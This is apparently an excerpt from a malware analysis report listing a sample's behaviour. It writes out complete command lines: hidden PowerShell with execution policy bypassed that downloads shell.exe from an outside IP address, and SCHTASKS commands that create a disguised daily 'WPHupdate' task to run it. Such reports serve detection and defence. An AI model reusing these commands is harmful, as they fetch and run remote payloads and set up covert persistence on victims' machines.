Technical Information
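- Creates the scheduled-task file <SYSTEM32>\tasks\wphupdate (task 'WPHupdate', set to run C:/temp/shell.exe daily at 18:18, per the SCHTASKS command lines below)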
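- Downloads http://89.##.182.43/shell.exe and saves it as c:/temp/shell.exe (fetched with PowerShell's System.Net.WebClient DownloadFile, per the command line below)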
- '<SYSTEM32>\cmd.exe' /c powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://89.##.182.43/shell.exe','C:/temp/she...
- '<SYSTEM32>\cmd.exe' /c powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command SCHTASKS /CREATE /SC DAILY /ST 18:18 /TN 'WPHupdate' /TR 'C:/temp/shell.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command SCHTASKS /CREATE /SC DAILY /ST 18:18 /TN 'WPHupdate' /TR 'C:/temp/shell.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden -command SCHTASKS /CREATE /SC DAILY /ST 18:18 /TN WPHupdate /TR C:/temp/shell.exe
- '<SYSTEM32>\schtasks.exe' /CREATE /SC DAILY /ST 18:18 /TN WPHupdate /TR C:/temp/shell.exe